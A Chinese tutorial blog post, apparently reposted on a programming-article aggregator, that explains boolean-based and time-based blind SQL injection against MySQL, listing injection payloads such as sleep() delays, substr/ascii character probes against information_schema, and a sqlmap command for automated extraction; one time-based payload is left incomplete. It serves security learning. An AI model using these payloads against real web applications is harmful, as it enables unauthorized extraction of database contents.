码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 盲注原理基础


    注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

    一、盲注介绍

            盲注=>没有回显点

            1.页面没有输出点

            盲注:

                    1.布尔盲注(能判对错)

                    and  database()="hjw123"        假如数据库是对的话页面有数据

                    2.时间盲注(能判时间)

                    and  sleep(10)  -- qwe        如果是时间盲注则页面有延迟

    二、盲注需要掌握的几个函数

            substr(字符串,从哪开始截,截多长)        字符串从1开始

             length(字符串)        输出长度

    三、盲注的做法

            and  length(database())>6        判断出长度

            and  substr(database(),1,1)="a"        判断出数据库名

                    也可用        ascii(substr(database(),1,1))>96        判断出库名

            

             and  length((select table_name from information_schema.tables where table_schema=database()))        判断出表名长度(注意length里面是子查询记得括号)

             and  substr((select table_name from information_schema.tables where table_schema=database()),1,1) >100       判断出表名

             小技巧:

                    1.Burp

                            爆破模块

                    2.python脚本(sqlmap\自己写)

                            python sqlmap.py -r D:\桌面\1.txt -delay 1 --level 3 --risk 2 -datch

                    若需要闭合就手动帮闭合下

            Mysql注入小技巧方法- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者

    四、延时输入(时间注入)

            if(条件,成立执行,不成立执行)

            case  when  条件  then  成立执行  else  不成立执行  end        (Mysql里的三目运算)

            and  if(length(database())>12,0,sleep(4))        判断出数据库长度

            and  if(ascii((substr(database(),1,1))))        判断出数据库第一个字母的ascii值

            接下来的做法都是差不多的

  • 相关阅读:
    开发一款招聘小程序需要具备哪些功能?
    mysql
    香港服务器,应该选用中国站 还是国际站?
    Observability and Inconsistency in a Nutshell
    解决npm报错Error: error:0308010C:digital envelope routines::unsupported
    #QT(事件--快捷键保存文件)
    关于Eslint语法检查报“error Extra semicolon semi”错误的解决办法
    有了红黑树,为啥还要跳表?
    122 买卖股票的最佳时机II
    计蒜客T3364 蒜头君的回文串(C++语言实现)
  • 原文地址:https://blog.csdn.net/qq_58000413/article/details/126871720
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号